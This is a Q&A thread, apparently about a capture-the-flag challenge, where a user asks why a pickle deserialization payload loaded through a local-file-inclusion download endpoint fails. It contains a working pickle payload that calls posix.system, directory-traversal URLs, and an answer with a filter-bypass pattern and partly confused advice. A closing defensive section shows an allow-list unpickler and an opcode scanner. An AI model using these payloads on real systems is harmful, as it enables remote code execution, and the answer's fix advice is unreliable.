
I'm trying to execute pickle shell-code through a download function on a website but I get the following error:

    <html> <h1>ERROR: Cannot load file</h1> <!--
    Traceback (most recent call last):
      File "/opt/example/handlers/UserHandlers.py", line 134, in get
        upload = pickle.load(f)
      File "/usr/local/lib/python2.7/pickle.py", line 1384, in load
        return Unpickler(file).load()
      File "/usr/local/lib/python2.7/pickle.py", line 864, in load
        dispatch[key](self)
      File "/usr/local/lib/python2.7/pickle.py", line 1096, in load_global
        klass = self.find_class(module, name)
      File "/usr/local/lib/python2.7/pickle.py", line 1130, in find_class
        __import__(module)
    ImportError: No module named posix
    --> </html>

Pickle Shellcode:

    cposix
    system
    p1
    (S'sleep 30'
    p2
    tRp3

I assume this is a path issue and I also can't import modules by filename. Keep in mind I'm using an LFI vulnerability to call my pickle shell-code.

Example: http://example.com/download?file=../../../pickle.txt

Could this be the cause of the issue? I should also note this is a CTF, so it should be vulnerable in one way or another. Thanks in advance!

  • This looks more like a Python programming question. Did you google "ImportError: No module named posix" or ask about this on stackoverflow.com?
    – camp0
    Commented Jun 25, 2019 at 11:31

2 Answers

    ImportError: No module named posix

is the problem here. You can either attempt to drop to a bash shell and use

    pip install posix

or, the best solution, just remove

    import posix

and replace it with

    import os

Your shell code needs to look like so according to https://cvedetails.com/cve/CVE-2013-5093/

    cposix\nsystem\np1\n(S'sleep 30'\np2\ntRp3.

Also try padding your directory traversal attack with additional characters to account for input sanitization.

    http://example.com/download?file=....//....//....//pickle.txt
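The root cause visible in the traceback is `pickle.load(f)` on a user-controlled file: the GLOBAL opcode lets the pickle import any module and call any callable. The following is an added example (not code from the question, the answers, or the CTF application) of how a handler like that would be fixed: scan the bytes for the globals they reference without executing them, and unpickle through a `find_class` allow-list so a `posix.system` / `os.system` reference is refused. The allow-list entry, the sample payload (the question's opcodes with the missing newline after `p3` restored so it parses) and the `try_restricted_load` helper are assumptions made for this example.

```python
import io
import pickle
import pickletools
from collections import OrderedDict

# Only the globals the application needs to rebuild its own objects.
# Anything else, including posix.system / os.system, is refused.
SAFE_GLOBALS = {("collections", "OrderedDict")}


def referenced_globals(data):
    """Return the (module, name) pairs a pickle would import, without running it.

    pickletools.genops only parses opcodes, so it is safe on untrusted input.
    GLOBAL and INST carry "module name" inline (protocol 0); STACK_GLOBAL
    (protocol 4) takes module and name from the two strings pushed before it.
    """
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler whose find_class refuses every global outside SAFE_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        # Raised before any __import__ happens, so the module is never loaded.
        raise pickle.UnpicklingError("refusing to import %s.%s" % (module, name))


def try_restricted_load(data):
    """Return (True, obj) on success, or (False, reason) when the pickle is refused."""
    try:
        return True, RestrictedUnpickler(io.BytesIO(data)).load()
    except Exception as exc:  # UnpicklingError, or ValueError on malformed input
        return False, str(exc)


# Constructed samples: the question's protocol-0 payload and a harmless
# protocol-4 pickle that legitimately references collections.OrderedDict.
ATTACK_PICKLE = b"cposix\nsystem\np1\n(S'sleep 30'\np2\ntRp3\n."
BENIGN_PICKLE = pickle.dumps(OrderedDict([("a", 1)]), protocol=4)
```

`referenced_globals` is the check to run at upload time (and to log), while `RestrictedUnpickler` is the load-time guard; neither replaces the better fix of not accepting pickle from users at all.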
